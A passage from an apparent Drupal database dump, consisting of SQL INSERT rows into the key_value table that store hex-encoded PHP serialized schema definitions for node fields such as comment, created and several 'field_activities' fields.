16c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a31323a22626f64795f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a31313a22626f64795f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a31313a22626f64795f666f726d6174223b613a313a7b693a303b733a31313a22626f64795f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.changed', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31393a226e6f64655f6669656c645f5f6368616e676564223b613a313a7b693a303b733a373a226368616e676564223b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a226368616e676564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.storage_schema.sql', 'node.field_schema_data.comment', 0x613a323a7b733a31333a226e6f64655f5f636f6d6d656e74223b613a343a7b733a31313a226465736372697074696f6e223b733a33363a22446174612073746f7261676520666f72206e6f6465206669656c6420636f6d6d656e742e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31343a22636f6d6d656e745f737461747573223b613a343a7b733a31313a226465736372697074696f6e223b733a39393a225768657468657220636f6d6d656e74732061726520616c6c6f776564206f6e207468697320656e746974793a2030203d206e6f2c2031203d20636c6f736564202872656164206f6e6c79292c2032203d206f70656e2028726561642f7772697465292e223b733a343a2274797065223b733a333a22696e74223b733a373a2264656661756c74223b693a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a323a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d733a32323a226e6f64655f7265766973696f6e5f5f636f6d6d656e74223b613a343a7b733a31313a226465736372697074696f6e223b733a34383a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c6420636f6d6d656e742e223b733a363a226669656c6473223b613a373a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a31343a22636f6d6d656e745f737461747573223b613a343a7b733a31313a226465736372697074696f6e223b733a39393a225768657468657220636f6d6d656e74732061726520616c6c6f776564206f6e207468697320656e746974793a2030203d206e6f2c2031203d20636c6f736564202872656164206f6e6c79292c2032203d206f70656e2028726561642f7772697465292e223b733a343a2274797065223b733a333a22696e74223b733a373a2264656661756c74223b693a303b733a383a226e6f74206e756c6c223b623a313b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a323a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.content_translation_outdated', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32383a22636f6e74656e745f7472616e736c6174696f6e5f6f75746461746564223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.content_translation_source', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a32363a22636f6e74656e745f7472616e736c6174696f6e5f736f75726365223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.created', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a323a7b733a363a226669656c6473223b613a313a7b733a373a2263726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a313b7d7d733a373a22696e6465786573223b613a313a7b733a31393a226e6f64655f6669656c645f5f63726561746564223b613a313a7b693a303b733a373a2263726561746564223b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a373a2263726561746564223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a383a226e6f74206e756c6c223b623a303b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.default_langcode', 0x613a323a7b733a31353a226e6f64655f6669656c645f64617461223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d733a31393a226e6f64655f6669656c645f7265766973696f6e223b613a313a7b733a363a226669656c6473223b613a313a7b733a31363a2264656661756c745f6c616e67636f6465223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_activities_description', 0x613a323a7b733a33343a226e6f64655f5f6669656c645f616374697669746965735f6465736372697074696f6e223b613a343a7b733a31313a226465736372697074696f6e223b733a35373a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f6465736372697074696f6e2e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33343a226669656c645f616374697669746965735f6465736372697074696f6e5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a33363a226669656c645f616374697669746965735f6465736372697074696f6e5f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b613a313a7b693a303b733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b7d7d7d733a34333a226e6f64655f7265766973696f6e5f5f6669656c645f616374697669746965735f6465736372697074696f6e223b613a343a7b733a31313a226465736372697074696f6e223b733a36393a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f6465736372697074696f6e2e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33343a226669656c645f616374697669746965735f6465736372697074696f6e5f76616c7565223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a313b7d733a33363a226669656c645f616374697669746965735f6465736372697074696f6e5f73756d6d617279223b613a333a7b733a343a2274797065223b733a343a2274657874223b733a343a2273697a65223b733a333a22626967223b733a383a226e6f74206e756c6c223b623a303b7d733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3235353b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b613a313a7b693a303b733a33353a226669656c645f616374697669746965735f6465736372697074696f6e5f666f726d6174223b7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_activities_download_file', 0x613a323a7b733a33363a226e6f64655f5f6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a35393a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f646f776e6c6f61645f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a33383a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a34323a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a343a7b693a303b733a393a22656e746974795f6964223b693a313b733a373a2264656c65746564223b693a323b733a353a2264656c7461223b693a333b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a313a7b693a303b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d733a34353a226e6f64655f7265766973696f6e5f5f6669656c645f616374697669746965735f646f776e6c6f61645f66696c65223b613a353a7b733a31313a226465736372697074696f6e223b733a37313a225265766973696f6e20617263686976652073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f646f776e6c6f61645f66696c652e223b733a363a226669656c6473223b613a393a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a33383a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f646973706c6179223b613a363a7b733a31313a226465736372697074696f6e223b733a37353a22466c616720746f20636f6e74726f6c207768657468657220746869732066696c652073686f756c6420626520646973706c61796564207768656e2076696577696e6720636f6e74656e742e223b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a22756e7369676e6564223b623a313b733a373a2264656661756c74223b693a313b733a383a226e6f74206e756c6c223b623a303b7d733a34323a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f6465736372697074696f6e223b613a333a7b733a31313a226465736372697074696f6e223b733a32363a2241206465736372697074696f6e206f66207468652066696c652e223b733a343a2274797065223b733a343a2274657874223b733a383a226e6f74206e756c6c223b623a303b7d7d733a31313a227072696d617279206b6579223b613a353a7b693a303b733a393a22656e746974795f6964223b693a313b733a31313a227265766973696f6e5f6964223b693a323b733a373a2264656c65746564223b693a333b733a353a2264656c7461223b693a343b733a383a226c616e67636f6465223b7d733a373a22696e6465786573223b613a333a7b733a363a2262756e646c65223b613a313a7b693a303b733a363a2262756e646c65223b7d733a31313a227265766973696f6e5f6964223b613a313a7b693a303b733a31313a227265766973696f6e5f6964223b7d733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a313a7b693a303b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b7d7d733a31323a22666f726569676e206b657973223b613a313a7b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b613a323a7b733a353a227461626c65223b733a31323a2266696c655f6d616e61676564223b733a373a22636f6c756d6e73223b613a313a7b733a34303a226669656c645f616374697669746965735f646f776e6c6f61645f66696c655f7461726765745f6964223b733a333a22666964223b7d7d7d7d7d),
('entity.storage_schema.sql', 'node.field_schema_data.field_activities_img', 0x613a323a7b733a32363a226e6f64655f5f6669656c645f616374697669746965735f696d67223b613a353a7b733a31313a226465736372697074696f6e223b733a34393a22446174612073746f7261676520666f72206e6f6465206669656c64206669656c645f616374697669746965735f696d672e223b733a363a226669656c6473223b613a31313a7b733a363a2262756e646c65223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a38383a22546865206669656c6420696e7374616e63652062756e646c6520746f207768696368207468697320726f772062656c6f6e67732c2075736564207768656e2064656c6574696e672061206669656c6420696e7374616e6365223b7d733a373a2264656c65746564223b613a353a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b693a303b733a31313a226465736372697074696f6e223b733a36303a224120626f6f6c65616e20696e6469636174696e67207768657468657220746869732064617461206974656d20686173206265656e2064656c65746564223b7d733a393a22656e746974795f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a33383a2254686520656e746974792069642074686973206461746120697320617474616368656420746f223b7d733a31313a227265766973696f6e5f6964223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a34373a2254686520656e74697479207265766973696f6e2069642074686973206461746120697320617474616368656420746f223b7d733a383a226c616e67636f6465223b613a353a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a383a226e6f74206e756c6c223b623a313b733a373a2264656661756c74223b733a303a22223b733a31313a226465736372697074696f6e223b733a33373a22546865206c616e677561676520636f646520666f7220746869732064617461206974656d2e223b7d733a353a2264656c7461223b613a343a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b733a31313a226465736372697074696f6e223b733a36373a225468652073657175656e6365206e756d62657220666f7220746869732064617461206974656d2c207573656420666f72206d756c74692d76616c7565206669656c6473223b7d733a33303a226669656c645f616374697669746965735f696d675f7461726765745f6964223b613a343a7b733a31313a226465736372697074696f6e223b733a32363a22546865204944206f66207468652066696c6520656e746974792e223b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a383a226e6f74206e756c6c223b623a313b7d733a32343a226669656c645f616374697669746965735f696d675f616c74223b613a343a7b733a31313a226465736372697074696f6e223b733a35363a22416c7465726e617469766520696d61676520746578742c20666f722074686520696d61676527732027616c7427206174747269627574652e223b733a343a2274797065223b733a373a2276617263686172223b733a363a226c656e677468223b693a3531323b733a383a226e